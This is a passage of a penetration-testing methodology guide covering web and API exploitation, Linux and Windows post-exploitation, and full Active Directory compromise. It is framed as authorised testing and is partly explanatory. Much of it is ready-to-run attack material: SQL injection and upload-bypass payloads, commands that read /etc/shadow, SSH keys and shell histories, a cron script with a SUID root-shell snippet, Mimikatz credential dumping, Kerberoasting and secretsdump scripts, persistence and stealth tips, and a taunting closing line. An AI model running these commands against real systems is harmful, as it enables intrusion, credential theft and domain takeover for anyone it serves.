- IDOR → unauthorized data access
- Authentication bypass
- Command / template injection
Example (SQLi testing in request):
' OR 1=1--

Activities:
- Execute payloads in controlled manner
- Capture:
- Requests
- Responses
- Screenshots
- Session artifacts
Important:
- Limit exploitation to proof-of-impact only
- Avoid full data dumps or destructive actions
Output:
- Web exploitation PoCs
- Evidence artifacts
4.3 File Handling & RCE Exploitation
File-related vulnerabilities often lead to Remote Code Execution (RCE).
Tools Used
- Burp Suite
- Custom payloads
- Manual validation
Techniques Used
- Upload-based execution
- Path traversal exploitation
Exploit:
- Unrestricted file upload
- File inclusion → code execution
- Insecure file download → sensitive data access
Example upload bypass attempt:
shell.php.jpg

Activities:
- Upload crafted files
- Attempt execution or retrieval
- Demonstrate:
- Arbitrary file read
- Limited command execution
Important:
- Avoid persistent shells unless explicitly allowed
- Keep execution non-destructive
Output:
- File-based exploitation PoCs
- RCE validation evidence
4.4 API Exploitation (If Applicable)
APIs often expose direct access to backend logic.
Tools Used
- Burp Suite
- Postman
Techniques Used
- Authorization abuse
- Data manipulation
Exploit:
- Broken Object Level Authorization (BOLA)
- Mass assignment
- Improper method handling
Activities:
- Modify request parameters
- Change object IDs
- Manipulate request bodies
Goal:
- Demonstrate unauthorized access
- Extract limited sensitive data
Output:
- API exploitation PoCs
- Unauthorized access evidence
4.5 Network & Service Exploitation
This step targets infrastructure-level vulnerabilities.
Tools Used
- Nmap
- Metasploit (msf)
- Netcat
- Service-specific tools
Techniques Used
- Service exploitation
- Misconfiguration abuse
Exploit:
- Weak authentication
- Known CVEs
- Exposed management interfaces
Example Metasploit usage:
use exploit/multi/handler

Activities:
- Exploit externally exposed services
- Validate access
Important:
- Avoid lateral movement unless required
- Do not cause service disruption
Output:
- Network/service exploitation evidence
- Access confirmation
4.6 Attack Chain Development
Individual vulnerabilities often become critical when combined together.
Techniques Used
- Chained exploitation
- Privilege escalation mapping
Activities:
- Combine multiple findings
- Demonstrate:
- Initial access
- Privilege escalation
- Expanded access
Example chain:
- IDOR → account access
- Weak auth → privilege escalation
- File upload → RCE
Focus on:
- Realistic attacker pathways
- Weakest entry points
Output:
- Attack chain diagrams
- End-to-end compromise scenarios
4.7 Impact Assessment
This step translates technical findings into business risk.
Assess
- Data confidentiality impact
- Integrity compromise
- Availability risk
- Regulatory/compliance impact
Activities
- Map vulnerabilities to real-world consequences
- Evaluate:
- Likelihood of exploitation
- Potential damage
Examples:
- Data leak → compliance violation
- RCE → full system compromise
- IDOR → unauthorized access
Output:
- Business impact assessment
- Risk justification
WHAT WE HAVE TILL NOW
At this stage, we have:
Validated and exploited high-impact vulnerabilities
Proof-of-concept (PoC) evidence for web, API, and network flaws
Demonstrated RCE and file-based exploitation (if applicable)
Confirmed unauthorized access via IDOR, auth bypass, or API flaws
Validated service-level exploitation and external access
Established realistic attack chains combining multiple weaknesses
Identified privilege escalation paths
Mapped technical vulnerabilities to real-world business impact
Collected complete evidence set (requests, responses, screenshots, artifacts)
# Phase 5 — Post-Exploitation (Linux) — Enumeration & Privilege Escalation
Once initial access is obtained, the objective shifts from exploitation to control, escalation, and expansion.
Post-exploitation on Linux systems focuses on:
- Enumerating the system thoroughly
- Identifying privilege escalation paths
- Extracting sensitive information
- Preparing for pivoting
This phase determines how far access can be extended.
5.1 System Enumeration (Linux)
Enumeration is the most critical step in post-exploitation. Every privilege escalation vector depends on accurate system intelligence.
Tools Used
- LinEnum
- Linux Smart Enumeration (LSE)
Start by identifying the operating system:
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
Check kernel version and architecture:
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
Environment variables often reveal useful information:
env
set
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
cat ~/.zshrc
Applications & Services Enumeration
Understanding running services is key to identifying privilege escalation vectors.
Check running processes:
ps aux
ps -elf
top
cat /etc/services
Identify services running as root:
ps aux | grep root
ps -elf | grep root
Check installed applications:
dpkg -l
rpm -qa
Inspect scheduled jobs:
crontab -l
cat /etc/cron*
cat /etc/cron.d/*
cat /etc/cron.daily/*
cat /etc/cron.hourly/*
cat /etc/cron.monthly/*
cat /etc/crontab
cat /etc/anacrontab
Misconfigured cron jobs are a common escalation vector.
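The cron checks above can be rolled into one small sketch that also hunts for the dangerous case: a cron-driven script the current user can write to. The paths are the standard cron locations; the exploitation one-liner in the comment is illustrative only:

```shell
#!/bin/sh
# Show system-wide cron entries (file may be absent on some distros)
echo "[*] System-wide cron entries:"
cat /etc/crontab 2>/dev/null
# Any file under /etc/cron* writable by us is a candidate escalation path
echo "[*] User-writable files under /etc/cron*:"
writable=$(find /etc/cron* -writable 2>/dev/null)
echo "${writable:-  (none found)}"
# If root's cron runs a script you can edit, appending something like
#   cp /bin/sh /tmp/rootsh && chmod 4755 /tmp/rootsh
# yields a SUID shell on the next scheduled run.
```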
Network & Communication Enumeration
Identify network interfaces and connections:
ifconfig
ip link
ip addr
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
Check network configuration:
cat /etc/resolv.conf
cat /etc/networks
iptables -L
hostname
dnsdomainname
Identify active connections and users:
lsof -i
netstat -antup
netstat -tulpn
last
w
This helps identify:
- Internal network access
- Lateral movement opportunities
User & Sensitive Data Enumeration
Identify users and privileges:
id
who
w
last
cat /etc/passwd
cat /etc/sudoers
sudo -l
Check sensitive files:
cat /etc/passwd
cat /etc/group
cat /etc/shadow
Explore user directories:
ls -ahlR /root/
ls -ahlR /home/
Search for credentials in files:
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
Check command history:
cat ~/.bash_history
cat ~/.zsh_history
cat ~/.mysql_history
cat ~/.php_history
Check for SSH keys:
cat ~/.ssh/*
These often provide direct access to other systems.
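The manual file checks above can be complemented by a broader sweep for credential-like strings; both the path list and the regex below are illustrative and should be tuned per engagement:

```shell
#!/bin/sh
# Recursively grep readable locations for common credential keywords;
# -i ignores case, -n prints line numbers for the evidence log
hits=$(grep -rniE 'password|passwd|secret|api[_-]?key' \
        /etc /home 2>/dev/null | head -n 20)
echo "[*] Sample credential-pattern hits:"
echo "${hits:-  (none found in sampled paths)}"
```

Expect noise; the value is in triaging hits against the services enumerated earlier.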
File System Enumeration
Inspect mounted file systems:
mount
df -h
cat /etc/fstab
Find world-writable files:
find / -xdev -type d -perm -0002 -ls 2> /dev/null
find / -xdev -type f -perm -0002 -ls 2> /dev/null
Find SUID binaries:
find / -perm -4000 -user root -exec ls -ld {} \; 2> /dev/null
SUID binaries are one of the most reliable privilege escalation vectors.
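A small sketch that combines the SUID search with a first-pass triage: it flags binary names that commonly have documented escalation routes. The candidate list is illustrative, not exhaustive; always confirm each hit against GTFOBins:

```shell
#!/bin/sh
# Names that frequently appear on GTFOBins with SUID escalation entries
# (illustrative subset -- verify each match manually)
candidates="bash find vim nano less more cp mv awk tar nmap python python3 perl"
suid_files=$(find / -perm -4000 -type f 2>/dev/null)
echo "[*] SUID binaries:"
echo "$suid_files"
for f in $suid_files; do
  # Flag any SUID binary whose basename is in the candidate list
  case " $candidates " in
    *" $(basename "$f") "*) echo "[!] Check GTFOBins: $f" ;;
  esac
done
```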
Capability & Tool Discovery
Check available tools:
which perl
which python
which python3
which gcc
Check file transfer capabilities:
which wget
which nc
which netcat
This determines:
- Exploitation options
- Payload delivery methods
5.2 Privilege Escalation (Linux)
Once enumeration is complete, the next step is to escalate privileges.
Tools Used
- Traitor
- GTFOBins
- Linux Exploit Suggester
- LinPEAS
Common escalation paths include:
- SUID binaries
- Misconfigured sudo permissions
- Writable cron jobs
- Kernel vulnerabilities
Recent Linux vulnerabilities to check:
- DirtyPipe (CVE-2022-0847)
- PwnKit (CVE-2021-4034)
- Baron Samedit (CVE-2021-3156)
Approach:
- Match kernel version with known exploits
- Check sudo permissions (sudo -l)
- Analyze writable scripts
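The approach above can be condensed into a quick triage sketch: capture the kernel release for matching against exploit databases (or feeding Linux Exploit Suggester) and check sudo rights non-interactively. Assumes a POSIX shell on the target:

```shell
#!/bin/sh
# Kernel release string -- compare against known LPE exploits for this version
kernel=$(uname -r)
echo "[*] Kernel release: $kernel"
# -n fails instead of prompting, so this is safe in a non-interactive shell
echo "[*] Sudo rights (non-interactive check):"
sudo -n -l 2>/dev/null || echo "    (no sudo, or a password is required)"
# NOPASSWD entries for GTFOBins-listed binaries (vim, find, less, ...)
# usually translate directly into a root shell.
```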
5.3 Post-Exploitation Actions
After privilege escalation, controlled actions may include:
- Service interaction or disruption (only if allowed)
- Uploading controlled payloads
- Creating persistence mechanisms
- Data exfiltration (limited and approved)
All actions must remain:
- Non-destructive
- Within engagement scope
5.4 Pivoting & Internal Network Discovery
Once access is obtained, the compromised system can be used as a pivot point.
Identify internal hosts:
for host in {1..154}; do ping -c1 192.168.1.$host | grep -B1 "1 received" | grep "statistics" | cut -d " " -f2; done | tee hosts.txt
This helps:
- Discover internal systems
- Expand attack surface
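A parameterised variant of that sweep, as a hedged sketch (adjust the host range and timeout to the environment; the prefix argument is the /24 discovered during enumeration):

```shell
#!/bin/sh
# Usage: sweep 192.168.1 > hosts.txt
sweep() {
  prefix=$1
  for host in $(seq 1 254); do
    # -c1: single probe, -W1: one-second timeout per host
    ping -c1 -W1 "$prefix.$host" >/dev/null 2>&1 && echo "$prefix.$host is up"
  done
}
```

Sequential pings are slow but quiet; where speed matters and scope allows, a tool like fping or an nmap ping sweep covers the same ground faster.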
Next steps:
- Scan internal network
- Identify additional targets
- Perform lateral movement
# Phase 5 — Post-Exploitation (Windows) — Enumeration, Privilege Escalation & Active Directory Attacks
Once access to a Windows system is obtained, the objective shifts to enumeration, privilege escalation, credential extraction, and lateral movement.
In enterprise environments, this phase typically evolves into Active Directory (AD) exploitation, where the ultimate goal is:
Domain Admin / full domain compromise
5.1 User & Privilege Enumeration
The first step is to understand the current security context.
Tools Used
- Built-in Windows commands
- PowerShell
Check current user and privileges:
whoami
whoami /priv
whoami /groups
whoami /all
PowerShell alternative:
[System.Security.Principal.WindowsIdentity]::GetCurrent()
Things to identify:
- Current user privileges
- Enabled privileges (SeDebug, SeImpersonate, etc.)
- Group memberships
These determine possible escalation paths.
5.2 Local Users & Group Enumeration
Understanding local accounts helps identify privileged access paths.
Tools Used
- net commands
- PowerShell
List local users:
net user
Check administrator group:
net localgroup administrators
PowerShell:
Get-LocalUser
Get-LocalGroupMember Administrators
If domain joined:
net user /domain
net group "Domain Admins" /domain
Things to identify:
- Admin accounts
- Privileged groups
- Domain users
5.3 System & Network Enumeration
Gather system and network information to identify vulnerabilities.
Tools Used
- Built-in commands
- PowerShell
System details:
systeminfo
Network configuration:
ipconfig /all
route print
arp -a
Active connections:
netstat -ano
PowerShell:
Get-NetIPConfiguration
Get-NetTCPConnection
Things to identify:
- OS version and patch level
- Internal network structure
- Active connections
5.4 Processes, Services & Scheduled Tasks
Misconfigured services are a common escalation vector.
Tools Used
- Built-in commands
- PowerShell
List processes:
tasklist /svc
List services:
sc query
PowerShell:
Get-Process
Get-Service
Scheduled tasks:
schtasks /query /fo LIST /v
Things to identify:
- Services running as SYSTEM
- Writable services
- Weak scheduled tasks
5.5 Firewall, Shares & Policies Enumeration
Misconfigurations here can expose sensitive data.
Tools Used
- netsh
- net commands
Firewall rules:
netsh advfirewall show allprofiles
netsh advfirewall firewall show rule name=all
Shares:
net share
net view
Group policies:
gpresult /z
Things to identify:
- Open shares
- Weak firewall rules
- Policy misconfigurations
5.6 Credential Dumping & Token Abuse
Once elevated privileges are obtained, extract credentials.
Tools Used
- Mimikatz
- Meterpreter (kiwi)
- Incognito
Example:
privilege::debug
sekurlsa::logonpasswords
Things to extract:
- Plaintext passwords
- NTLM hashes
- Kerberos tickets
These enable:
- Lateral movement
- Privilege escalation
5.7 Local Privilege Escalation
Escalation can occur due to:
- Misconfigurations
- Weak permissions
- Known exploits
Techniques Used
- Token manipulation
- Service abuse
- Exploit execution
Check privileges:
whoami /priv
Look for:
- SeImpersonatePrivilege
- SeDebugPrivilege
Common vectors:
- Unquoted service paths
- Writable services
- Token impersonation (Potato attacks)
5.8 Active Directory Enumeration
If the system is domain-joined, move to domain-level enumeration.
Tools Used
- BloodHound
- PowerView
- AD Module
- CrackMapExec
Enumerate domain:
Get-Domain
Get-DomainSID
Users and groups:
Get-DomainUser
Get-DomainGroup
Network enumeration:
cme smb 192.168.1.0/24Things to identify:
- Domain controllers
- Admin users
- Service accounts
- Trust relationships
5.9 Credential Attacks (Kerberos & NTLM)
Active Directory heavily relies on credentials, making them a primary attack vector.
Techniques Used
- Kerberoasting
- ASREPRoasting
- Password spraying
- Pass-the-Hash
Targets:
- Service accounts
- Weak user credentials
Goal:
- Extract credentials for escalation
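As a hedged sketch of the Kerberoasting technique listed above, run from the attacker machine with Impacket: any authenticated domain user can request TGS tickets for SPN-bearing accounts and crack them offline. The domain, username, and DC IP below are placeholders for values obtained during enumeration:

```shell
#!/bin/sh
# Placeholder engagement values -- replace with real enumeration output
DOMAIN="corp.local"; USER="lowpriv"; DC_IP="192.168.1.10"
echo "[*] Requesting TGS tickets for all SPN-bearing accounts..."
# -request fetches crackable tickets; hashes land in roast.txt
GetUserSPNs.py "$DOMAIN/$USER" -dc-ip "$DC_IP" -request -outputfile roast.txt \
  </dev/null 2>/dev/null || echo "    (Impacket missing or DC unreachable)"
# Crack offline:  hashcat -m 13100 roast.txt wordlist.txt
```

Cracked service-account passwords frequently carry elevated privileges, feeding directly into lateral movement.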
5.10 Lateral Movement
Using obtained credentials, move across systems.
Techniques Used
- Pass-the-Hash
- Pass-the-Ticket
- Remote execution
Targets:
- Domain controllers
- Admin machines
- File servers
Goal:
- Expand access within the network
5.11 Privilege Escalation to Domain Admin
The ultimate objective in AD environments is:
👉 Domain Admin access
Common paths:
- Misconfigured ACLs
- Delegation abuse
- Weak service accounts
Examples:
- Unconstrained delegation
- DNSAdmins abuse
5.12 NTDS Extraction & Domain Compromise
Once high privileges are achieved, extract domain credentials.
Tools Used
- Mimikatz
- Impacket (secretsdump)
Example:
secretsdump.py domain/user:password@dc-ip
This provides:
- Full domain password database (NTDS.dit)
This stage equals complete domain compromise
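A minimal sketch of the extraction step above, run from the attacker machine; the credentials and DC IP are placeholders for the privileged access obtained earlier:

```shell
#!/bin/sh
# Placeholder DC address -- substitute the real domain controller
DC_IP="192.168.1.10"
echo "[*] Dumping NTDS.dit hashes via DCSync..."
# -just-dc-ntlm limits output to NTLM hashes; -outputfile saves evidence
secretsdump.py "corp.local/domadmin:Passw0rd!@$DC_IP" -just-dc-ntlm \
  -outputfile ntds </dev/null 2>/dev/null \
  || echo "    (Impacket missing or DC unreachable)"
# The resulting NTLM hashes support offline cracking or direct Pass-the-Hash
# reuse (e.g. psexec.py -hashes LM:NT domain/user@host).
```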
5.13 Persistence in Active Directory
Attackers maintain long-term access using persistence mechanisms.
Techniques Used
- Golden Ticket
- Silver Ticket
- Backdoor accounts
- Registry persistence
Goal:
- Maintain access after detection
5.14 Data Exfiltration & Impact
Final stage focuses on demonstrating impact.
Activities:
- Extract sensitive data
- Access critical systems
- Demonstrate control over infrastructure
WHAT WE HAVE TILL NOW
At this stage, we have:
Full Windows host enumeration
Local privilege escalation (SYSTEM/admin access)
Credential dumping (passwords, hashes, tickets)
Domain enumeration (users, groups, controllers)
Credential attacks (Kerberos & NTLM abuse)
Lateral movement across internal systems
Privilege escalation to Domain Admin
NTDS.dit extraction (full credential database)
Persistence mechanisms established
Full Active Directory compromise (domain dominance)
Some tips:
In addition to the core post-exploitation workflow, several advanced operational considerations further enhance effectiveness and realism:
- Routing awareness: analyze network paths (e.g. route print) to identify pivoting opportunities across internal subnets.
- Session awareness: in frameworks like Meterpreter, built-in commands such as sysinfo, getuid, getprivs, and ipconfig provide quick situational awareness; combine them with automated post-exploitation modules (privilege enumeration, logged-on users, patch enumeration, AV detection) to accelerate intelligence gathering.
- UAC bypass: where administrative privileges are present but restricted by User Account Control, consider bypass techniques to fully elevate the execution context.
- Persistence: where permitted, demonstrate mechanisms such as creating users, modifying group memberships, scheduling tasks, or leveraging registry run keys, ensuring continued access without re-exploitation.
- Stealth: use Living Off The Land techniques (LOLBins), relying on trusted native binaries such as PowerShell, certutil, and mshta instead of dropping external payloads.
- Defensive awareness: enumerate antivirus and endpoint protection configurations before executing payloads.
- Known high-impact vulnerabilities: actively evaluate PrintNightmare, BlueKeep, and token impersonation exploits (particularly when privileges like SeImpersonatePrivilege are available) as part of the privilege escalation strategy.
- Lateral movement: monitor active sessions (net session) to reveal movement opportunities, and use compromised hosts to scan internal networks and expand the attack surface.
These considerations ensure that post-exploitation is treated not as a static checklist, but as a dynamic process driven by environment context, attacker adaptability, and real-world tradecraft.
If you got this far, imagine what someone without rules would do.